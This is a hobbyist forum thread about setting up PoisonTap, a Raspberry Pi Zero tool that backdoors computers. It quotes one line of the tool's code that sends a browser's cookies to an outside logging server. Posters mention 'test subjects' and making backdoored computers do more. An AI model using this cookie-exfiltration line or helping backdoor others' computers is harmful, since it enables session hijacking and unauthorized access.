PoisonTap Thinktank #1
Hello!

Samy Kamkar is an individual who always has interesting gadgets and tools at his disposal and has inspired most of my tinkering desires. My current project to figure out is Poisontap and I was hoping this community was also interested in this project and currently playing around with it.

I've gotten the Pi0 and am currently trying to setup my server as well but I feel I might be missing something or doing things wrong.

Poisontap Github The code from Samy is here and I've taken a look at it and still feel perplexed.

In regards to the server, his original  code pointed to his server:
new Image().src='http://samy.pl/poisontap/log.php?log='+document.cookies;
If I can get to it, if it has an interface or display, maybe I can inspect the elements and copy it over... maybe the .js file in the github is the node.js I need on my server?

Has anyone dabbled in this yet or is anyone currently playing around with this?

As a side note, I'm just getting into the world of servers, I've had training but this is the first server I've built and managed myself and I have not done anything with node.js before. So if it's something basic and super simple that I'm missing, sorry.

I originally posted this in Hacking tools but I feel it goes better here due to it being a request for thoughts, insight and ideas.

Looks very interesting, it's not really a programming language I know but I have never heard of this. Looks pretty promising!

If I make a breakthrough I'm going to be moving this from request to a tutorial with my setup (minus my details) and credit any help I get on this forum.

I'm still waiting for my Pi0, I've should have gotten it in my mail like 2 days ago...
These projects are the main reason that I bought a Pi0. I will definitely try this when I get my hands on the Pi0

Update:
Samy has posted, along with a fellow contributor, a tutorial on setting up the Pi0 so even with my little progress these instructions are far more simple than what I was attempting and are easy to accomplish.

Also the server is working (sort of) because I was finally able to get node.js running without errors. I could go into detail about what I did however it would be simpler to go to the source, scroll down to install and follow those steps.

This person updated the install to be a little more thurough in regards to the Pi0 Setup: https://github.com/jr-k/poisontap/tree/0...11eb3b3ad1

Also read the Issues section. I will update this hopefully with status of completion, test subjects and responses. Some of the code that poisontap claims to be able to exicute on these backdoored computers is things like Warnings and URL redirects. Hopefully if we can get a few of these running and testing well we can figure out other things to make these computers do.
